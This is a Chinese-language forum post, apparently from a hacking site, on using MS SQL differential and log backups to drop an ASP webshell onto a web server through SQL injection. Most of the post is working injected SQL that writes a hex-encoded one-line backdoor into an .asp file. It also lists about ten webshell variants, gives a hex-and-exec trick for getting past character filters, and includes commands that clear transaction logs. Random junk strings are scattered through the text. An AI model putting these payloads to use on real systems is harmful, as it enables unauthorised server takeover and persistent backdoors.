MSsql差异备份总结

admin

差异备份的流程大概这样：
% }1 I8 y3 Z' e2 J' d; ^# z1.完整备份一次(保存位置当然可以改)
+ G& G6 O7 E% r' u2 i' mbackup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据
7 J0 }0 a+ y* c- k3 Wcreate table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
3 [9 Z: _+ b1 I; z. a9 s3 M" W0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
4 R5 |% V  q* B) }7 I, e. U
如下是网上常见的差异备份代码，思路一样！
1 S+ |$ x1 p- _, i===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
9 p' W1 |) b0 B& h7 [步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

6 k  r! l* M) t' ~2 Gcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
5 ^. I8 R* D0 n
* U( m8 J- M" r% Wdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
+ @5 ^9 b5 X. b( y' S0 H* e
drop table [xiaolu]  -- 删除此表。
1 p) w) b4 R1 s+ W& c: U: U
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
4 h6 Z. Y: z) f5 p0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

3 J! e! H# W5 H3 F9 R3 w/ H声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================
( t# E/ d2 D; [4 f4 r9 G7 ?
$ P/ Q3 G/ ~$ }4 D我发现上面代码，有时会无效，而直接用

backup database 库名 to disk = 'c:\ddd.bak'

create table [dbo].[dtest] ([cmd] [image]);

1 }( u0 V1 \  q' s) f" V+ Kinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
+ n  w5 d3 e  e9 H! w
% j) q$ j. _6 Q却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
6 y7 Y. t4 B+ \+ g& b# U
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
2 N4 M& \7 W2 e- J6 i7 O! n
; n" u6 _1 F# q+ f. c! z/ T网上还有log增量备份的，我也把他记录一下
( T# R7 ?: _& x2 ]=====================================================
* Y8 R4 l0 [0 C4 v另一种log增量备份技术:

" v; W* ^) z3 E; E';alter database null set RECOVERY FULL--
9 v# b* ~& |! w* N& h6 i- m: j
2 Y/ f* ]7 _2 T+ G& ]  Q';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--

- }- Q, I2 ?5 x# E';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--

" g: V. |5 q3 v* Z';drop table cmd--

- i7 b3 }; s9 h) G* w6 x';alter database XXX set RECOVERY SIMPLE--
0 a- W/ a6 J* i" T8 {
( T7 f1 I9 a% iPS:0x3C2565786563757465287265717565737428226122292
9 Z; J( j& s- Y( H9253EDA 是一句话小马16进制转来的
$ X) `6 K- P2 L
说到一句话马，还可以有这么几种写法：
0 N" F0 r" L/ N& x& W) t8 |& u
- q5 w& {! G+ k! A4 la)<%%25Execute(request("a"))%%25>
  c( @& `# z( J5 q( T- rb)<%Execute(request("a"))%>
0 k- p4 ?8 N' @; p( s% Q. L* }c)%><%execute request("a")%><%
, K3 a' h7 Q5 _9 k! i, M: Fd)<script language=VBScript runat=server>execute request("a")</script>
3 ?1 [3 P9 s+ h1 L5 H" T* ke)<%25Execute(request("a"))%25>
4 u  c6 U# Z; Q9 P# P, mf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
, D7 I0 k% c6 j: y3 T7 gh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================

3 b% [# a3 o, y当遇到差备过滤了/时用这个语句代替
* Y2 T& h' H- h0 h* C) @
1 e/ D% I9 a) c' Udeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
9 A* r$ K1 l$ C0 x* E; H0 n) V
把要执行的语句转16进制然后用exec执行

5 M# c  v$ O8 n( ]
减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
" s. y; x* M+ b- s0 Iid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
  N6 S9 M+ |2 w3 r3 j6 L* a2
0 s1 s" H: ?7 X  {0 Y: Eid=1;backup database model to disk='你的路径‘ with differential,format;--
/ S: j) e6 A" S: M8 j
. w. B& L7 i! u% s

( h1 N8 q$ H5 x/ v4 `, USQL语句清理日志
注：test为数据库名

--清空日志
DUMP TRANSACTION test WITH NO_LOG
. f, o' O$ X& L# I0 S+ R% z  D" o
--截断事务日志
; K( e! z- K  ]  QBACKUP LOG test WITH NO_LOG

; e; v* j# c5 ~- e# E) ?7 N7 l--收缩数据库
DBCC SHRINKDATABASE(test)
! M" d0 q8 n3 S6 s8 Z" o- c- z
. J- ^5 _2 i" e, {* ]--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
& B0 i5 o% d7 w6 }% L% s% G
--以后能自动收缩
7 e0 R+ |/ l- J7 u, z: `7 @EXEC sp_dboption 'test', 'autoshrink', 'TRUE'